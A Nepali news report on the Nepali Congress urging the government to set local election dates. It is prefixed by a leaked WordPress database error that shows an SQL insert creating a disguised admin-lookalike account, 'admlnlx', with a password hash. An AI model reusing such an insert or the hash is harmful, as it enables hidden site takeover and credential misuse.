WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B1uyPy2/6dTzS2LKX5nKy6E0pUOU/q0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 18:16:16', '', 'admlnlx', 'admlnlx')
काठमाडौँ, पुस १० –
नेपाली काँग्रेसले तत्काल स्थानीय निकायको निर्वाचनको मिति घोषणा गर्न सरकारलाई आग्रह गरेको छ ।
काँग्रेस संसदीय दलको कार्यालय सिंहदरबारमा आज बसेको पार्टी पदाधिकारी र पूर्वपदाधिकारीको बैठकमा आगामी दुई महिनाभित्र स्थानीय निर्वाचन हुनुपर्ने विषयमा छलफल भएको महामन्त्री डा शशाङ्क कोइरालाले जानकारी दिनुभयो ।
निर्वाचन स्थानीय निकायको नयाँ वा पुरानो कुन संरचनामा गर्ने भन्ने बहसमा काँग्रेसले पुरानै संरचना अर्थात् निकायको निर्वाचन गर्दा सजिलो हुने निष्कर्ष निकालेको महामन्त्री डा कोइरालाले बताउनुभयो । काँग्रेसले जसरी भए पनि स्थानीय निर्वाचन गराउनुपर्ने सरकारसँग माग गरेको छ । स्थानीय निर्वाचन घोषणा गर्दा हाल व्यवस्थापिका–संसद् अवरुद्ध गर्दै आएका नेकपा ९एमाले० लगायत विपक्षी दलमाथि संसद् खोल्न दबाब पर्ने काँग्रेसको रणनीति छ ।
निर्वाचन मिति घोषणा गर्ने सम्बन्धमा काँग्रेसले एमाले, नेकपा ९माओवादी केन्द्र० लगायत दलसँग छलफल गरी राष्ट्रिय सहमति खोज्ने पार्टीका वरिष्ठ नेता रामचन्द्र पौडेलले बताउनुभयो । संविधान संशोधन विधेयकमाथि संसद्मा छलफल गर्न दिनुपर्ने पनि उहाँको भनाइ छ । संसद् खोल्ने सम्बन्धमा काँग्रेसले सबै दलसँग छलफल सुरु गर्ने निष्कर्ष निकालेको छ । बैठक सोमबार पनि बस्नेछ । – रासस